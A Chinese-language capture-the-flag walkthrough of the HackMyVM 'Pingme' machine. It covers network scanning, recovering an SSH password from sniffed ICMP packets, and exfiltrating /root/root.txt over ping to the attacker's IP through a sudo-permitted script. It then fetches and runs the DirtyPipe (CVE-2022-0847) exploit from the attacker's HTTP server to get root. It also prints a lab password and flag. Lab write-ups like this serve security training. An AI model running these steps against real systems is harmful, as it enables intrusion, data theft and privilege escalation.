渗透靶场——HackMyVM:Pingme_hackmyvm-gift

部署环境

提供镜像文件后，直接用虚拟机打开即可，kali攻击机用VMware打开即可，靶机用vbox打开即可

kali攻击机ip地址：桥接自动获取ip

靶机ip地址：（桥接自动获取ip）

提示信息:

CTF
1

目标: user.txt和root.txt

信息收集

扫描主机

arp-scan -l

发现存活主机192.168.1.10

扫描端口

扫描靶机开放的服务端口

nmap -A -T4 -p- 192.168.1.10

发现还是只有22端口和80端口开放

Web渗透

访问web端口

http://192.168.1.10/

发现就是一个ping的界面，看看源码有什么提示信息
提示说传输ICMP数据包，那就按照提示看看icmp包里传输了什么

1、攻击机上开启tcpdump抓icmp包并保存

tcpdump -i eth0 icmp -w icmp

2、访问页面，让后台直接执行Ping命令（就访问就行，其他的不用做啥操作）
3、执行完成后在攻击机上手动Ctrl+c结果抓包，

4、使用wireshark加载包查看传输内容
接下来就仔细看看这个流分包里有什么东西
我们可以看到两次传输的包内有username和pasword内容，我们看一下各个包在

那就在这里发现了用户名，那就看看密码

这样也就拿到了密码P!ngM3

用户名：pinger
密 码：P!ngM3

那就直接上ssh看一下

ssh pinger@192.168.1.10

发现getshell成功，那就搜集下主机中的敏感信息

ls
cat user.txt

这就拿到了第一个任务目标

HMV{ICMPisSafe}

继续看一下有什么敏感信息

sudo -l

发现可以使用root身份去执行sendfilebyping命令，我们先看看这个程序是做什么的

cat /usr/local/sbin/sendfilebyping

这个程序是使用ping命令来传输文件，我们试试

1、攻击机打开tcpdump抓icmp包并输出为file.pacpng

tcpdump -i eth0 icmp -w file.pacpng

2、靶机上执行sendfilebyping命令，这里试着猜测/root/目录下有一个root.txt文件

sudo /usr/local/sbin/sendfilebyping 192.168.1.8 /root/root.txt

一共发了21个包，现在手动关闭攻击机上的tcpdump，
使用wireshark打开file.pacpng文件

会发现在这里，每一个数据包都有一个字符
这就是最终的flag，本人懒，，，就不去找了，大家到时候自己实验看看就行~

虽然现在已经把两个任务都完成，但是这个提权还是不能少，我们直接上提权

提权

查看一下内核版本号
此内核版本存在CVE-2022-0847-DirtyPipe漏洞，尝试复现这个漏洞

下载exp

git clone https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit.git

下载完成开始编译

cd CVE-2022-0847-DirtyPipe-Exploit
ls
chmdo +x compile.sh
./compile.sh
ls

编译完成，现在将exp上传到靶机中执行。

1、攻击机上开启HTTP服务

python3 -m http.server

2、靶机下载exp添加可执行权限并执行

cd /tmp
wget http://192.168.1.8:8000/exploit
chmod +x exploit
./exploit

从这步开始由于时间问题，我就直接拿大佬的截图直接上来了，大家可以直接关注他的公众号去看下
提示找不到GLIBC_2.33，原因是攻击机上的GLIBC是高版本的，对靶机上的版本检查只有2.30这个版本，随后我从其他低版本的机器上编译了exp并上传到了靶机上。(已放到百度盘)

./exp

根据提示，exp修改了passwd文件中的root密码，修改后的密码为aaron，验证一下

su root

提权成功，来看下flag

cd /root
ls
cat root.txt

结束~